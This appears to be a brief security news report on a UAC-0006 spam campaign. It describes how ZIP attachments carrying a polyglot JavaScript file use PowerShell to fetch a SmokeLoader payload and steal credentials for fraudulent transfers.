- The Gamaredon Organization That Steals Data in 30 minutes, is Combated by Cyber Defenders - August 20, 2023
- Microsoft IIS Servers Targeted by Lazarus - August 18, 2023
- AI-Powered Hacker Threats - August 18, 2023
An Initiative With a Monetary Motivation
According to the notice, the hackers are sending spam emails with the subject “bill/payments” and a ZIP file attached.
The attacks have been attributed to the UAC-0006 gang, which is believed to have been active from around 2013.
Criminals seek to obtain authentication-related information, like credentials, keys, or certificates, and then conduct illicit financial transactions into accounts under their control.
Investigating the Polyglot File Further
PowerShell is used by the polyglot file pax_2023_AB1058..js to download and run additional payloads. It specifically downloads a program named portable.exe, which when executed activates the SmokeLoader virus.
The file’s generation date and the domain’s registration date imply that the campaign began in April 2023. When activated, SmokeLoader injects malicious code into presently executing processes and begins downloading further payloads.